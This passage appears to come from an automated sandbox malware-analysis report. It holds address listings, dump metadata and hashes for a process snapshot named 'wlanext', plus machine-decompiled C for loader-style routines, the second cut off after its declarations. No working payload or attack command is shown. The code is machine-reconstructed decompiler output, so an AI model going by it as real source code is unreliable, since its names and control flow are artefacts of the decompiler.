                                  0x0354b35a
                                  0x00000000
                                  0x0354b328
                                  0x0354b328
                                  0x00000000
                                  0x0354b328
                                  0x0354b326
                                  0x034fd658
                                  0x034fd658
                                  0x034fd65b
                                  0x034fd665
                                  0x00000000
                                  0x034fd66b
                                  0x034fd66b
                                  0x034fd66b
                                  0x034fd66b
                                  0x034fd66d
                                  0x034fd672
                                  0x034fd67a
                                  0x00000000
                                  0x00000000
                                  0x034fd680
                                  0x034fd686
                                  0x034fd8ce
                                  0x034fd8d4
                                  0x034fd8da
                                  0x034fd8dd
                                  0x034fd8dd
                                  0x034fd8e0
                                  0x034fd68c
                                  0x034fd691
                                  0x034fd69d
                                  0x034fd6a2
                                  0x034fd6a7
                                  0x034fd6b0
                                  0x034fd6b0
                                  0x034fd6b5
                                  0x034fd6e0
                                  0x034fd6b7
                                  0x034fd6b7
                                  0x034fd6b9
                                  0x034fd6b9
                                  0x034fd6bb
                                  0x034fd6bd
                                  0x034fd6ce
                                  0x034fd6d0
                                  0x034fd6d2
                                  0x0354b363
                                  0x0354b365
                                  0x00000000
                                  0x0354b36b
                                  0x00000000
                                  0x0354b36b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034fd6bf
                                  0x034fd6bf
                                  0x034fd6e5
                                  0x034fd6e7
                                  0x034fd6e9
                                  0x034fd6e9
                                  0x034fd6ec
                                  0x034fd6ec
                                  0x034fd6ef
                                  0x034fd6f5
                                  0x034fd6f9
                                  0x034fd6fb
                                  0x034fd6fd
                                  0x034fd701
                                  0x034fd703
                                  0x034fd70a
                                  0x034fd70a
                                  0x034fd70a
                                  0x034fd701
                                  0x034fd70d
                                  0x034fd710
                                  0x034fd710
                                  0x034fd6c1
                                  0x034fd6c1
                                  0x034fd6c1
                                  0x034fd6c6
                                  0x0354b36d
                                  0x0354b36f
                                  0x00000000
                                  0x0354b375
                                  0x0354b375
                                  0x0354b375
                                  0x00000000
                                  0x0354b375
                                  0x00000000
                                  0x034fd6cc
                                  0x034fd6d8
                                  0x034fd6d8
                                  0x034fd6d8
                                  0x00000000
                                  0x034fd6c6
                                  0x034fd6bf
                                  0x00000000
                                  0x034fd6da
                                  0x034fd6da
                                  0x034fd716
                                  0x034fd71b
                                  0x034fd720
                                  0x034fd726
                                  0x034fd726
                                  0x034fd72d
                                  0x00000000
                                  0x034fd733
                                  0x034fd739
                                  0x034fd742
                                  0x034fd750
                                  0x034fd758
                                  0x034fd764
                                  0x034fd776
                                  0x034fd77a
                                  0x034fd783
                                  0x034fd928
                                  0x034fd92c
                                  0x034fd93d
                                  0x034fd944
                                  0x034fd94f
                                  0x034fd954
                                  0x034fd956
                                  0x034fd95f
                                  0x034fd961
                                  0x034fd973
                                  0x034fd973
                                  0x034fd956
                                  0x034fd944
                                  0x034fd92c
                                  0x034fd78b
                                  0x0354b394
                                  0x034fd791
                                  0x034fd798
                                  0x0354b3a3
                                  0x0354b3bb
                                  0x0354b3bb
                                  0x034fd7a5
                                  0x034fd866
                                  0x034fd870
                                  0x034fd884
                                  0x034fd892
                                  0x034fd898
                                  0x034fd89e
                                  0x034fd8a0
                                  0x034fd8a6
                                  0x034fd8ac
                                  0x034fd8ae
                                  0x034fd8b4
                                  0x034fd8b4
                                  0x034fd8ae
                                  0x034fd7a5
                                  0x034fd78b
                                  0x034fd7b1
                                  0x0354b3c5
                                  0x0354b3c5
                                  0x034fd7c3
                                  0x034fd7ca
                                  0x034fd7e5
                                  0x034fd7eb
                                  0x034fd8eb
                                  0x034fd8ed
                                  0x00000000
                                  0x034fd8f3
                                  0x034fd8f3
                                  0x034fd8f3
                                  0x00000000
                                  0x034fd8ed
                                  0x034fd7cc
                                  0x034fd7cc
                                  0x034fd7d2
                                  0x00000000
                                  0x034fd7d4
                                  0x034fd7d4
                                  0x034fd7d7
                                  0x034fd7df
                                  0x0354b3d4
                                  0x0354b3d9
                                  0x0354b3dc
                                  0x0354b3dc
                                  0x0354b3df
                                  0x0354b3e2
                                  0x0354b468
                                  0x0354b46d
                                  0x0354b46f
                                  0x0354b46f
                                  0x0354b475
                                  0x034fd8f8
                                  0x034fd8f9
                                  0x034fd8fd
                                  0x0354b3e8
                                  0x0354b3e8
                                  0x0354b3eb
                                  0x0354b3ed
                                  0x00000000
                                  0x0354b3ef
                                  0x0354b3ef
                                  0x0354b3f1
                                  0x0354b3f4
                                  0x0354b3fe
                                  0x0354b404
                                  0x0354b409
                                  0x0354b40e
                                  0x0354b410
                                  0x0354b410
                                  0x0354b414
                                  0x0354b414
                                  0x0354b41b
                                  0x0354b420
                                  0x0354b423
                                  0x0354b425
                                  0x0354b427
                                  0x0354b42a
                                  0x0354b42d
                                  0x0354b42d
                                  0x0354b42a
                                  0x0354b432
                                  0x0354b436
                                  0x0354b438
                                  0x0354b43b
                                  0x0354b43b
                                  0x0354b449
                                  0x0354b44e
                                  0x0354b454
                                  0x0354b458
                                  0x0354b458
                                  0x0354b45d
                                  0x00000000
                                  0x0354b45d
                                  0x0354b3ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034fd7df
                                  0x034fd7d2
                                  0x034fd7ca
                                  0x0354b37c
                                  0x0354b37e
                                  0x0354b385
                                  0x0354b38a
                                  0x00000000
                                  0x0354b38a
                                  0x034fd742
                                  0x034fd7f1
                                  0x034fd7f8
                                  0x0354b49b
                                  0x0354b49b
                                  0x034fd800
                                  0x034fd837
                                  0x034fd843
                                  0x034fd845
                                  0x034fd847
                                  0x034fd84a
                                  0x034fd84b
                                  0x034fd84e
                                  0x034fd857
                                  0x034fd802
                                  0x034fd802
                                  0x034fd80d
                                  0x00000000
                                  0x034fd818
                                  0x034fd818
                                  0x034fd824
                                  0x034fd831
                                  0x0354b4a5
                                  0x0354b4ab
                                  0x0354b4b3
                                  0x0354b4b8
                                  0x0354b4bb
                                  0x00000000
                                  0x0354b4c1
                                  0x0354b4c1
                                  0x0354b4c8
                                  0x00000000
                                  0x0354b4ce
                                  0x0354b4d4
                                  0x0354b4e1
                                  0x0354b4e3
                                  0x0354b4e5
                                  0x00000000
                                  0x0354b4eb
                                  0x0354b4f0
                                  0x0354b4f2
                                  0x034fdac9
                                  0x034fdacc
                                  0x034fdacf
                                  0x034fdad1
                                  0x034fdd78
                                  0x034fdd78
                                  0x034fdcf2
                                  0x00000000
                                  0x034fdad7
                                  0x034fdad9
                                  0x034fdadb
                                  0x00000000
                                  0x00000000
                                  0x034fdae1
                                  0x034fdae1
                                  0x034fdae4
                                  0x034fdae6
                                  0x0354b4f9
                                  0x0354b4f9
                                  0x0354b500
                                  0x034fdaec
                                  0x034fdaec
                                  0x034fdaf5
                                  0x034fdaf8
                                  0x034fdafb
                                  0x034fdb03
                                  0x034fdb11
                                  0x034fdb16
                                  0x034fdb19
                                  0x034fdb1b
                                  0x0354b52c
                                  0x0354b531
                                  0x0354b534
                                  0x034fdb21
                                  0x034fdb21
                                  0x034fdb24
                                  0x034fdcd9
                                  0x034fdce2
                                  0x034fdce5
                                  0x034fdd6a
                                  0x034fdd6d
                                  0x00000000
                                  0x034fdd73
                                  0x0354b51a
                                  0x0354b51c
                                  0x0354b51f
                                  0x0354b524
                                  0x00000000
                                  0x0354b524
                                  0x034fdce7
                                  0x034fdce7
                                  0x034fdce7
                                  0x00000000
                                  0x034fdce7
                                  0x00000000
                                  0x034fdb2a
                                  0x034fdb2c
                                  0x034fdb31
                                  0x034fdb33
                                  0x034fdb36
                                  0x034fdb39
                                  0x034fdb3b
                                  0x034fdb66
                                  0x034fdb66
                                  0x034fdb3d
                                  0x034fdb3d
                                  0x034fdb3e
                                  0x034fdb46
                                  0x034fdb47
                                  0x034fdb49
                                  0x034fdb4c
                                  0x034fdb53
                                  0x034fdb55
                                  0x034fdb58
                                  0x034fdb5a
                                  0x0354b50a
                                  0x0354b50f
                                  0x0354b512
                                  0x034fdb60
                                  0x034fdb60
                                  0x034fdb63
                                  0x034fdb63
                                  0x00000000
                                  0x034fdb63
                                  0x034fdb5a
                                  0x034fdb3b
                                  0x034fdb24
                                  0x034fdb69
                                  0x034fdb69
                                  0x034fdb6c
                                  0x034fdb6f
                                  0x034fdb74
                                  0x0354b557
                                  0x0354b557
                                  0x0354b55e
                                  0x034fdb7a
                                  0x034fdb7c
                                  0x034fdb7f
                                  0x034fdb82
                                  0x034fdb85
                                  0x00000000
                                  0x034fdb8b
                                  0x034fdb8b
                                  0x034fdb8d
                                  0x034fdb9b
                                  0x034fdb9b
                                  0x034fdb9d
                                  0x034fdba0
                                  0x034fdba2
                                  0x034fdba4
                                  0x034fdba7
                                  0x034fdba9
                                  0x034fdbae
                                  0x034fdbae
                                  0x034fdbb1
                                  0x034fdbb4
                                  0x034fdbb4
                                  0x034fdbb7
                                  0x034fdbba
                                  0x034fdcd2
                                  0x034fdcd4
                                  0x00000000
                                  0x034fdbc0
                                  0x034fdbc0
                                  0x034fdbd2
                                  0x034fdbd7
                                  0x034fdbda
                                  0x034fdbdd
                                  0x034fdbdf
                                  0x00000000
                                  0x034fdbe5
                                  0x034fdbe5
                                  0x034fdbee
                                  0x034fdbf1
                                  0x0354b541
                                  0x0354b544
                                  0x00000000
                                  0x0354b546
                                  0x0354b546
                                  0x00000000
                                  0x0354b546
                                  0x034fdbf7
                                  0x034fdbf7
                                  0x034fdbfd
                                  0x034fdbfd
                                  0x034fdbff
                                  0x034fdc0b
                                  0x034fdc15
                                  0x034fdc1b
                                  0x034fdc1d
                                  0x034fdc21
                                  0x034fdc21
                                  0x034fdc23
                                  0x034fdc23
                                  0x034fdc26
                                  0x034fdc29
                                  0x034fdc2b
                                  0x00000000
                                  0x00000000
                                  0x034fdc31
                                  0x034fdc34
                                  0x034fdc36
                                  0x034fdcbf
                                  0x034fdcbf
                                  0x034fdcc2
                                  0x00000000
                                  0x034fdc3c
                                  0x034fdc41
                                  0x034fdc43
                                  0x00000000
                                  0x034fdc45
                                  0x034fdc45
                                  0x034fdc47
                                  0x00000000
                                  0x034fdc4d
                                  0x034fdc4d
                                  0x034fdc50
                                  0x034fdc52
                                  0x034fdc55
                                  0x034fdcfa
                                  0x034fdcfe
                                  0x034fdd08
                                  0x034fdd0a
                                  0x034fdd0c
                                  0x00000000
                                  0x034fdd12
                                  0x034fdd15
                                  0x034fdd2d
                                  0x034fdd2f
                                  0x034fdd32
                                  0x034fdd35
                                  0x00000000
                                  0x034fdd35
                                  0x034fdc5b
                                  0x034fdc5b
                                  0x034fdc5e
                                  0x034fdc61
                                  0x034fdc64
                                  0x034fdc67
                                  0x034fdc67
                                  0x034fdc6a
                                  0x034fdc6c
                                  0x034fdc8e
                                  0x034fdc8e
                                  0x034fdc91
                                  0x034fdc93
                                  0x034fdcce
                                  0x034fdcce
                                  0x034fdc95
                                  0x034fdc9c
                                  0x034fdc6e
                                  0x034fdc72
                                  0x034fdc75
                                  0x034fdc77
                                  0x034fdc79
                                  0x0354b551
                                  0x0354b551
                                  0x00000000
                                  0x034fdc7f
                                  0x034fdc7f
                                  0x034fdc81
                                  0x00000000
                                  0x034fdc83
                                  0x034fdc86
                                  0x034fdc88
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034fdc88
                                  0x034fdc81
                                  0x034fdc79
                                  0x034fdc6c
                                  0x034fdc55
                                  0x034fdc47
                                  0x034fdc43
                                  0x00000000
                                  0x034fdc36
                                  0x034fdc23
                                  0x00000000
                                  0x034fdbff
                                  0x034fdbf1
                                  0x034fdbdf
                                  0x034fdb8f
                                  0x034fdb92
                                  0x034fdb95
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034fdb95
                                  0x034fdb8d
                                  0x034fdb85
                                  0x034fdb74
                                  0x034fdc9f
                                  0x034fdca2
                                  0x034fdcb0
                                  0x034fdcb0
                                  0x034fdad1
                                  0x0354b4e5
                                  0x0354b4c8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034fd831
                                  0x034fd80d
                                  0x00000000
                                  0x034fd800
                                  0x0354b47f
                                  0x0354b485
                                  0x00000000
                                  0x0354b485
                                  0x034fd665
                                  0x034fd652
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d248dd4abdc8ba514a2e1aae2ead367d242964bf5ad4e7b9d0b21e5143aca87a
                                  • Instruction ID: e15d6b56d4695dc3fc1df52d1e54bf7b42c8f3d248c35cc386c3a2254022983a
                                  • Opcode Fuzzy Hash: d248dd4abdc8ba514a2e1aae2ead367d242964bf5ad4e7b9d0b21e5143aca87a
                                  • Instruction Fuzzy Hash: 83E1E234E013198FEB34DF19D840B6AB7B6BF86308F0C019ADA595F3A4D7309986CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034F849B Relevance: .3, Instructions: 290COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E034F849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x35bf9c0);
				E0353D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x35d7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E034FCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03502280( *[fs:0x30], 0x35d8550);
						_t139 =  *0x35d7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0351F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E034FFFB0(_t193, _t235, 0x35d8550);
								L5:
								return E0353D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E034E1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x35d7b9c; // 0x0
							_t235 = L03504620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x35d7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0351A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E034FFFB0(_t193, _t235, 0x35d8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L035077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L035077F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x35d7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x35d7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E035237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x35d7b9c; // 0x0
									_t214 = L03504620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E035237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x35d7b10 =  *0x35d7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x35d7b04 =  *0x35d7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L035077F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L035077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x35d7b08 =  *0x35d7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E035257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0352F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L035077F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0351A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L035077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E035296C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                  0x034f849b
                                  0x034f849b
                                  0x034f849b
                                  0x034f849b
                                  0x034f849d
                                  0x034f84a2
                                  0x034f84a7
                                  0x034f84b1
                                  0x034f84d8
                                  0x00000000
                                  0x034f84b3
                                  0x034f84c4
                                  0x034f84c9
                                  0x034f84cd
                                  0x034f84cf
                                  0x034f84cf
                                  0x034f84d6
                                  0x034f84e6
                                  0x034f84e9
                                  0x034f84ec
                                  0x034f84ef
                                  0x034f84f2
                                  0x034f84f4
                                  0x034f84fc
                                  0x034f8501
                                  0x034f8506
                                  0x034f8509
                                  0x034f86e0
                                  0x034f86e5
                                  0x034f86e8
                                  0x034f86ed
                                  0x034f86f0
                                  0x034f86f2
                                  0x03549afd
                                  0x03549b02
                                  0x034f84da
                                  0x034f84df
                                  0x034f84df
                                  0x034f86fa
                                  0x034f86fd
                                  0x034f86fe
                                  0x034f8701
                                  0x034f8706
                                  0x034f8709
                                  0x034f870b
                                  0x00000000
                                  0x00000000
                                  0x034f8711
                                  0x034f8725
                                  0x034f8727
                                  0x034f872a
                                  0x034f872c
                                  0x03549af0
                                  0x03549af5
                                  0x034f8732
                                  0x034f8732
                                  0x034f8732
                                  0x034f8735
                                  0x034f8737
                                  0x034f8515
                                  0x034f8515
                                  0x034f8518
                                  0x034f851d
                                  0x034f8523
                                  0x034f8527
                                  0x034f852b
                                  0x034f8537
                                  0x034f8539
                                  0x034f853c
                                  0x034f853e
                                  0x034f868c
                                  0x034f8691
                                  0x034f8699
                                  0x034f869b
                                  0x034f8744
                                  0x034f8748
                                  0x034f86a1
                                  0x034f86a1
                                  0x034f86a1
                                  0x034f86a4
                                  0x034f86a8
                                  0x03549bdf
                                  0x03549bdf
                                  0x034f86ae
                                  0x034f86b0
                                  0x00000000
                                  0x034f86b6
                                  0x00000000
                                  0x03549be9
                                  0x034f86b0
                                  0x034f8544
                                  0x034f854a
                                  0x034f854d
                                  0x034f8551
                                  0x034f876e
                                  0x034f8778
                                  0x034f877b
                                  0x034f8780
                                  0x034f8557
                                  0x034f8557
                                  0x034f855d
                                  0x034f855d
                                  0x034f856b
                                  0x034f856e
                                  0x034f8570
                                  0x034f8573
                                  0x034f8576
                                  0x034f8576
                                  0x034f8579
                                  0x034f857b
                                  0x00000000
                                  0x00000000
                                  0x034f8581
                                  0x034f85a0
                                  0x034f85a2
                                  0x034f85a5
                                  0x034f85a7
                                  0x03549b1b
                                  0x03549b1b
                                  0x034f862e
                                  0x034f862e
                                  0x034f8631
                                  0x034f8631
                                  0x034f8634
                                  0x034f8636
                                  0x034f8669
                                  0x034f8669
                                  0x034f866b
                                  0x03549bbf
                                  0x03549bc4
                                  0x03549bc8
                                  0x03549bce
                                  0x03549bce
                                  0x034f8671
                                  0x034f8671
                                  0x034f8674
                                  0x034f8676
                                  0x03549bae
                                  0x03549bae
                                  0x034f8676
                                  0x034f867c
                                  0x034f867e
                                  0x034f8688
                                  0x034f8688
                                  0x00000000
                                  0x034f867e
                                  0x034f8638
                                  0x034f8638
                                  0x034f863b
                                  0x034f863e
                                  0x034f863f
                                  0x034f8642
                                  0x034f8645
                                  0x034f8648
                                  0x034f864d
                                  0x03549b69
                                  0x03549b6e
                                  0x03549b7b
                                  0x03549b81
                                  0x03549b85
                                  0x03549b89
                                  0x03549ba7
                                  0x03549b8b
                                  0x03549b91
                                  0x03549b9a
                                  0x03549b9f
                                  0x03549b9f
                                  0x034f8788
                                  0x034f878d
                                  0x034f8763
                                  0x034f8763
                                  0x034f8766
                                  0x00000000
                                  0x034f8766
                                  0x03549b70
                                  0x00000000
                                  0x03549b70
                                  0x034f8656
                                  0x034f865a
                                  0x034f865c
                                  0x034f8752
                                  0x034f8756
                                  0x00000000
                                  0x00000000
                                  0x034f875e
                                  0x00000000
                                  0x034f875e
                                  0x034f8662
                                  0x034f8662
                                  0x034f8662
                                  0x034f8666
                                  0x00000000
                                  0x034f8666
                                  0x034f85b7
                                  0x034f85b9
                                  0x034f85bc
                                  0x034f85bf
                                  0x034f85cc
                                  0x034f85d1
                                  0x034f85d4
                                  0x034f85db
                                  0x034f85de
                                  0x034f85e0
                                  0x03549b5f
                                  0x00000000
                                  0x03549b5f
                                  0x034f85e6
                                  0x034f85ea
                                  0x034f86c3
                                  0x034f86c5
                                  0x034f86c8
                                  0x034f86ca
                                  0x03549b16
                                  0x00000000
                                  0x03549b16
                                  0x034f86d6
                                  0x034f85f6
                                  0x034f85f6
                                  0x034f85f9
                                  0x034f8602
                                  0x034f8606
                                  0x034f860a
                                  0x034f860b
                                  0x034f860e
                                  0x034f8611
                                  0x00000000
                                  0x034f8611
                                  0x034f85f3
                                  0x00000000
                                  0x034f85f3
                                  0x034f8619
                                  0x034f861e
                                  0x034f861e
                                  0x034f8621
                                  0x034f8622
                                  0x034f8623
                                  0x034f8625
                                  0x034f862c
                                  0x00000000
                                  0x034f873d
                                  0x00000000
                                  0x034f873d
                                  0x034f8737
                                  0x034f850f
                                  0x034f8512
                                  0x00000000
                                  0x034f8512
                                  0x00000000
                                  0x034f84d6

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 143cf8398ac6c75f5c5a89151e5633bba0a79f644e07e01c2c425af0862c3685
                                  • Instruction ID: acc9c1f2827cb5d9096e35871481142c0c1f799f38c916ed5e3feafbe2d7416a
                                  • Opcode Fuzzy Hash: 143cf8398ac6c75f5c5a89151e5633bba0a79f644e07e01c2c425af0862c3685
                                  • Instruction Fuzzy Hash: 96B18E74E00309DFDB14DF99D984AAEFBB9BF88304F18412AE515AF365D770A846CB44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351513A Relevance: .3, Instructions: 258COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E0351513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
